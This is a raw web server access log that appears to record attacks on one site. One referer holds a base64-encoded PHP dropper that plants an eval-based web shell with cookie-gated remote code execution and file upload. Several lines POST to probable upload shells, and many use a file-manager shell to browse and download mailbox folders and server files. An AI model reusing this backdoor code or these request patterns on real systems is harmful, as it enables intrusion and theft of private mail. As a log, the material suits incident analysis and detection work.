146.103.119.117 - - [07/Dec/2025:06:41:15 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
66.249.64.109 - - [07/Dec/2025:06:43:21 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS8uaW11bmlmeV9wYXRjaF9pZC50YXI= HTTP/1.1" 200 181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:46:39 +0000] "GET /aeee1/?gz=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vcHJvamVjdHMvdG1w HTTP/1.1" 200 6464 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.109 - - [07/Dec/2025:06:49:04 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czAyMjAyNS5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 10224 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
192.121.16.196 - - [07/Dec/2025:06:50:28 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2751.59 Safari/537.36"
146.103.119.117 - - [07/Dec/2025:06:41:07 +0000] "GET / HTTP/1.1" 200 1725 "-" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
146.103.119.117 - - [07/Dec/2025:06:41:08 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
146.103.119.117 - - [07/Dec/2025:06:41:08 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
66.249.64.109 - - [07/Dec/2025:06:41:34 +0000] "GET /aeee1/index.php(1)%20:%20eval()'d%20code(2)%20:%20eval()'d%20code?img=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9zZXVnaHR1bmdoZHl5c2hyeS9hZG1pbi9hc3NldHMvaW1hZ2VzL3VzZXIucG5n HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:41:43 +0000] "GET /aeee1/?fm=true&rename=index.html&path=/home/i446698/tmp/webalizer/ HTTP/1.1" 200 8140 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.110 - - [07/Dec/2025:06:42:27 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vY29udHJhY3RzL25ldy8xNzYyMTk5MjAxLk05NDQ5MzFQMTI5MDQwOS5hbHRhcjQ1LnN1cHJlbWVwYW5lbDQ1LmNvbSxTPTYzMzEsVz02NTAw HTTP/1.1" 200 2173 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:43:47 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS9ob3VybHlfdXNhZ2VfMjAyNDExLnBuZy50YXI= HTTP/1.1" 200 2230 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:43:49 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA3MjAyNS5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 9366 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:44:25 +0000] "GET /aeee1/?fm=true&rights=cur&path=/home/i446698/mail/metalescrose.com/it/.Sent/ HTTP/1.1" 200 8165 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
192.121.16.196 - - [07/Dec/2025:06:50:17 +0000] "GET / HTTP/1.1" 200 1725 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2751.59 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:06:50:17 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2751.59 Safari/537.36"
66.249.64.108 - - [07/Dec/2025:06:52:12 +0000] "GET /aeee1/?gzfile=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA4MjAyNS5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 6464 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:56:14 +0000] "GET /aeee1/?fm=true&rename=tmp&path=/home/i446698/mail/metalescrose.com/relations/.Drafts/ HTTP/1.1" 200 8184 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.108 - - [07/Dec/2025:06:43:15 +0000] "GET /aeee1/?fm=true&path=/home/i446698/mail/metalescrose.com/corporatecommunications/.Sent/.. HTTP/1.1" 200 10850 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
